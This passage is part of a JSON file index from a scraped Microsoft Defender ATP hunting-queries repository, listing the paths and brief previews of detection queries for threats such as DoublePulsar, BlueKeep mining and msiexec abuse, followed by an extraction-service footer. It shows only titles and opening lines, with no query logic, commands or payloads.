"preview": "// Find all machines running a given Powersehll cmdlet.\n// This covers all Powershell commands executed in the Powershel"
},
{
"path": "Execution/Webserver Executing Suspicious Applications.md",
"chars": 1860,
"preview": "# Webserver Executing Suspicious Applications\n\nThis query looks for common webserver process names and identifies any pr"
},
{
"path": "Execution/check-for-shadowhammer-activity-implant.md",
"chars": 1904,
"preview": "# Check for ShadowHammer-related implant or container activity\n\nThis query was originally published in the threat analyt"
},
{
"path": "Execution/detect-anomalous-process-trees.md",
"chars": 10244,
"preview": "# Detect anomalous process trees\n\nThis query generates process trees of given processes and performs anomaly detection o"
},
{
"path": "Execution/detect-bluekeep-related-mining.md",
"chars": 2741,
"preview": "# Detect BlueKeep-related cryptocurrency mining\n\nThis query was originally published in the threat analytics report, *Ex"
},
{
"path": "Execution/detect-doublepulsar-execution.md",
"chars": 1911,
"preview": "# Detect DoublePulsar execution\n\nThis query was originally published in the threat analytics report, *Motivated miners*."
},
{
"path": "Execution/detect-exploitation-of-cve-2018-8653.md",
"chars": 1763,
"preview": "# Detect exploitation of the Internet Explorer remote code execution vulnerability, CVE-2018-8653\n\nThis query was origin"
},
{
"path": "Execution/detect-malcious-use-of-msiexec.md",
"chars": 2382,
"preview": "# Detect malicious use of Msiexec\n\nThis query was originally published in the threat analytics report, *Msiexec abuse*.\n"
}
]
// ... and 186 more files (download for full content)
About this extraction
This page contains the full source code of the microsoft/WindowsDefenderATP-Hunting-Queries GitHub repository, extracted and formatted as plain text (386 files, 5.9 MB, approximately 1.6M tokens).
Extracted by GitExtract. Built by Nikandr Surkov.